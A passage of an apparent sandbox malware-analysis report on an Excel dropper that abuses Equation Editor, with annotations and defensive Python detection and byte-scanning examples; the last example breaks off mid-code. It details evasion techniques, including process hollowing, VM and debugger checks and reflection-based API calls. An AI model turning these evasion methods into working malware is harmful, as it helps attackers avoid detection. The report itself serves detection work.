Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\OIU.exe C:\Users\user\AppData\Roaming\OIU.exe
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\OIU.exe
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: unknown | Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 --field-trial-handle=1256,i,7674118080207217716,3458138178017285583,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown | Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1200,i,5669568352595894290,4267387126016238941,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\OIU.exe C:\Users\user\AppData\Roaming\OIU.exe
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\OIU.exe
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 --field-trial-handle=1256,i,7674118080207217716,3458138178017285583,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1200,i,5669568352595894290,4267387126016238941,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
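The process-creation lines above are the whole infection chain in four hops: EXCEL.EXE starts EQNEDT32.EXE, EQNEDT32.EXE starts the file it just wrote to %AppData%\Roaming\OIU.exe, and each OIU.exe instance starts RegSvcs.exe whose command line is the OIU.exe path rather than its own. That last detail is the usual footprint of a hollowed host: the loader creates the .NET utility and maps the payload into it, and the Memory allocated lines earlier in this block show the same RWX region in EQNEDT32.EXE, OIU.exe and RegSvcs.exe. The Section loaded lines that follow add a second tell, EQNEDT32.EXE pulling in winhttp.dll, webio.dll and dnsapi.dll, which an equation renderer has no reason to do. The following is an added example of the detection logic a SOC would run over such telemetry; it is not Joe Sandbox code and not the Sigma rules the report cites. The event records are constructed from this report's lines, and the rule names, field names and DLL list are the example's own choices.

```python
"""Added example: detection logic over process-create and image-load events
for the Office -> EQNEDT32.EXE -> user-directory binary -> hollowed RegSvcs.exe
chain. Not Joe Sandbox or Sigma code; the sample events are constructed from
the process-creation and section-loaded lines in this report."""
import ntpath

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
USER_DIR_MARKERS = ("\\appdata\\", "\\users\\public\\", "\\programdata\\")
# Modules that only make sense if a process is resolving names or speaking HTTP.
NETWORK_DLLS = {"winhttp.dll", "webio.dll", "dnsapi.dll", "wininet.dll", "ws2_32.dll"}


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def first_token(cmdline):
    """Image path as written at the start of a command line ('"x y" z' -> 'x y')."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:].split('"', 1)[0]
    return cmdline.split(" ", 1)[0]


def check_process_create(ev):
    """Return the names of the rules a process-create event trips."""
    parent, image, cmd = basename(ev["parent_image"]), basename(ev["image"]), ev["cmdline"]
    hits = []
    if parent in {"winword.exe", "excel.exe", "powerpnt.exe"} and image == "eqnedt32.exe":
        hits.append("office_spawns_equation_editor")
    if parent == "eqnedt32.exe" and image != "eqnedt32.exe":
        hits.append("equation_editor_child_process")
    if parent in OFFICE_IMAGES and any(m in ev["image"].lower() for m in USER_DIR_MARKERS):
        hits.append("office_spawns_binary_in_user_dir")
    # Hollowing tell: the created image (RegSvcs.exe) is not the image named on
    # its own command line (OIU.exe). A normally started process names itself.
    claimed = basename(first_token(cmd)) if cmd else image
    if claimed != image:
        hits.append("image_cmdline_mismatch")
    return hits


def check_image_load(ev):
    """Flag EQNEDT32.EXE loading a networking DLL."""
    if basename(ev["image"]) == "eqnedt32.exe" and basename(ev["module"]) in NETWORK_DLLS:
        return ["equation_editor_loads_network_dll"]
    return []


def run(events):
    """Evaluate every event; returns {event index: [rule, ...]} for events that fired."""
    fired = {}
    for i, ev in enumerate(events):
        hits = check_process_create(ev) if ev["kind"] == "process_create" else check_image_load(ev)
        if hits:
            fired[i] = hits
    return fired


EQ = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
XL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
OIU = r"C:\Users\user\AppData\Roaming\OIU.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed events, transcribed from this report's process tree and module loads.
SAMPLE_EVENTS = [
    {"kind": "process_create", "parent_image": XL, "image": EQ, "cmdline": f'"{EQ}" -Embedding'},
    {"kind": "process_create", "parent_image": EQ, "image": OIU, "cmdline": OIU},
    {"kind": "process_create", "parent_image": OIU, "image": REGSVCS, "cmdline": OIU},
    {"kind": "process_create", "parent_image": OIU, "image": OIU, "cmdline": f'"{OIU}"'},
    {"kind": "image_load", "image": EQ, "module": "winhttp.dll"},
    {"kind": "image_load", "image": EQ, "module": "dwmapi.dll"},
]

if __name__ == "__main__":
    for idx, rules in run(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["kind"], rules)
```

Two tuning notes. `image_cmdline_mismatch` also fires on legitimate launchers that rewrite argv[0], so on its own it is a low-confidence signal and is best scored together with the parent-chain rules. And on a host where Equation Editor has been removed by Microsoft's 2018 Office updates, any EQNEDT32.EXE execution at all is the alert; the rules above are for estates that still carry it.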
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\OIU.exe (identical list in each of the five OIU.exe instances) :: Section loaded: wow64win.dll, wow64cpu.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, iphlpapi.dll, winnsi.dll, uxtheme.dll, dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder :: Window detected: more than 3 window changes detected
Source: Order Request1_5_24.xlam.xlsx :: Initial sample: OLE zip file path = xl/media/image1.jpg
Source: Order Request1_5_24.xlam.xlsx :: Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE :: Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE :: File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: _.pdb :: source: RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp; RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb :: source: OIU.exe, 00000003.00000003.457625635.0000000002B10000.00000004.00001000.00020000.00000000.sdmp; OIU.exe, 00000003.00000003.457568121.0000000002C70000.00000004.00001000.00020000.00000000.sdmp; OIU.exe, 00000005.00000003.460414972.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp; OIU.exe, 00000005.00000003.460320894.0000000002990000.00000004.00001000.00020000.00000000.sdmp; OIU.exe, 00000007.00000003.462048122.0000000002B20000.00000004.00001000.00020000.00000000.sdmp; OIU.exe, 00000007.00000003.462023023.0000000002950000.00000004.00001000.00020000.00000000.sdmp; OIU.exe, 00000009.00000003.463861681.00000000025F0000.00000004.00001000.00020000.00000000.sdmp; OIU.exe, 00000009.00000003.463799420.0000000002A60000.00000004.00001000.00020000.00000000.sdmp; OIU.exe, 0000000B.00000003.465588880.00000000029E0000.00000004.00001000.00020000.00000000.sdmp; OIU.exe, 0000000B.00000003.465720630.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
(wntdll.pdb is the PDB name of the 32-bit ntdll.dll. Finding it in two private memory regions of every OIU.exe instance, rather than only at the module's mapped base, is consistent with the dropper loading its own copy of ntdll, a common way to get past user-mode API hooks; the report does not make that determination itself, so treat it as a lead to confirm in the memory dumps.)
Source: Order Request1_5_24.xlam.xlsx :: Initial sample: OLE indicators vbamacros = False
(No VBA: the code-execution path in this document is the embedded Equation Editor object, not a macro, so macro-blocking policies alone do not stop it.)

                  Data Obfuscation

Source: 12.2.RegSvcs.exe.{300ee8.0, 530000.3, 3766458.7, 37b7770.6, b70196.4}.raw.unpack, WP6RZJql8gZrNhVA9v.cs :: .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
(Resolving Marshal.GetDelegateForFunctionPointer through reflection lets the payload call arbitrary native function pointers without a static P/Invoke import that would show up in the assembly's metadata; the same obfuscated class appears in all five unpacked regions.)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo (3_2_00BA42DE)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code functions with push reg; ret sequences: 3_2_00BC0A76 push ecx; ret (3_2_00BC0A89); 3_2_00C35959 push ebp; ret (3_2_00C3595F); 3_2_00C35968 push edi; ret (3_2_00C3596B); 3_2_00C3596C push ebp; ret (3_2_00C3596F); 3_2_00C35971 push esi; ret (3_2_00C35973); 3_2_00C35975 push edi; ret (3_2_00C35977); 3_2_00C35978 push ebp; ret (3_2_00C3597B)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Code functions with push/ret or push/iretd sequences: 12_2_0041C40C push cs; iretd (12_2_0041C4E2); 12_2_00423149 push eax; ret (12_2_00423179); 12_2_0041C50E push cs; iretd (12_2_0041C4E2); 12_2_004231C8 push eax; ret (12_2_00423179); 12_2_0040E21D push ecx; ret (12_2_0040E230); 12_2_0041C6BE push ebx; ret (12_2_0041C6BF); 12_2_002E475C push ebx; retf (12_2_002E4762)
Source: 12.2.RegSvcs.exe.{300ee8.0, 530000.3, 3766458.7, 37b7770.6, b70196.4}.raw.unpack, WP6RZJql8gZrNhVA9v.cs :: High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Q7YThFiogb6dB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: File created: C:\Users\user\AppData\Roaming\OIU.exe (dropped file)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BBF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput (3_2_00BBF98E)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed (3_2_00C31C41)
Process information set: NOOPENFILEERRORBOX :: observed 7 times in C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, 3 times in C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, 8 times in C:\Users\user\AppData\Roaming\OIU.exe and 45 times in C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

                  Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\OIU.exe :: Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_3-100568)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear (12_2_004019F0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Evasive API call chain: GetModuleFileName, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Roaming\OIU.exe :: API coverage: 4.3 %
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1912 :: Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
(Win32_BaseBoard, Win32_Processor and Win32_NetworkAdapterConfiguration expose the board manufacturer and product strings, the CPU name and the adapter MAC addresses, all of which carry hypervisor-specific values; the three queries together are the usual WMI-based virtual-machine check. Note the 4.3 % API coverage for OIU.exe: most of its code was never reached in this run, so the behaviour listed here is a lower bound.)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose (3_2_00C0DBBE)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BDC2A2 FindFirstFileExW (3_2_00BDC2A2)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C168EE FindFirstFileW,FindClose (3_2_00C168EE)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime (3_2_00C1698F)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose (3_2_00C0D076)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose (3_2_00C0D3A9)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose (3_2_00C19642)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose (3_2_00C1979D)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose (3_2_00C19B2B)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C15C97 FindFirstFileW,FindNextFileW,FindClose (3_2_00C15C97)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo (3_2_00BA42DE)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: API call chain: ExitProcess graph end node (graph_2-2302)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: API call chain: ExitProcess graph end node (graph_2-2085)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C1EAA2 BlockInput (3_2_00C1EAA2)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter (3_2_00BD2622)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear (12_2_004019F0)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo (3_2_00BA42DE)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Code function: 2_2_0352088E mov edx, dword ptr fs:[00000030h] (2_2_0352088E)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BC4CE8 mov eax, dword ptr fs:[00000030h] (3_2_00BC4CE8)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code functions mov eax, dword ptr fs:[00000030h], three per instance at the same image-relative offsets: 3_2_00113500, 3_2_00113560, 3_2_00111ED0; 5_2_001D3500, 5_2_001D1ED0, 5_2_001D3560; 7_2_00153500, 7_2_00151ED0, 7_2_00153560; 9_2_00213500, 9_2_00213560, 9_2_00211ED0; 11_2_00551ED0, 11_2_00553560, 11_2_00553500
(fs:[30h] is the 32-bit process's PEB pointer. Reading it gives direct access to PEB.BeingDebugged at offset 0x02 and PEB.NtGlobalFlag at offset 0x68 without calling IsDebuggerPresent, which is why the sandbox flags it; the same read is also how ordinary CRT and loader code reaches the PEB, so the EQNEDT32.EXE hit at 0x0352088E is more telling than the OIU.exe ones, since that address lies outside any module mapped by the Equation Editor itself and points at injected shellcode.)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00C00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree (3_2_00C00B62)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BC09D5 SetUnhandledExceptionFilter (3_2_00BC09D5)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter (3_2_00BD2622)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter (3_2_00BC083F)
Source: C:\Users\user\AppData\Roaming\OIU.exe :: Code function: 3_2_00BC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (3_2_00BC0C21)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (12_2_0040CE09)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Code function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (12_2_0040E61C)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Code function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter (12_2_00416F6A)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Code function: 12_2_004123F1 SetUnhandledExceptionFilter (12_2_004123F1)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe :: Memory allocated: page read and write | page guard
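The push reg; ret sequences listed under Data Obfuscation and the fs:[30h] PEB reads listed above are both things the sandbox found by pattern-matching instruction bytes in the dumped code. The following scanner, an added example that is not part of the Joe Sandbox report and not code from the sample, does the same triage over a raw code buffer: it finds one-byte PUSH r32 followed by RET/RETF, PUSH CS; IRETD, and MOV r32, FS:[30h] in either of its two encodings, and prints offset, bytes and a disassembly-style label. The input buffer is constructed inline from the exact instruction shapes the report lists; it is not bytes from OIU.exe or RegSvcs.exe.

```python
import re

# Register selected by the low 3 bits of a one-byte PUSH r32 (0x50 + r) and by
# the reg field of a ModR/M byte.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# fs:[30h] is the 32-bit PEB pointer. "mov eax, fs:[30h]" has the short form
# 64 A1 30 00 00 00; any register uses 64 8B /r with mod=00 rm=101 (disp32),
# i.e. a ModR/M byte of 0x05 | (reg << 3).
PATTERNS = [
    ("push_ret",      re.compile(rb"[\x50-\x57]\xC3")),
    ("push_retf",     re.compile(rb"[\x50-\x57]\xCB")),
    ("push_cs_iretd", re.compile(rb"\x0E\xCF")),
    ("peb_read",      re.compile(
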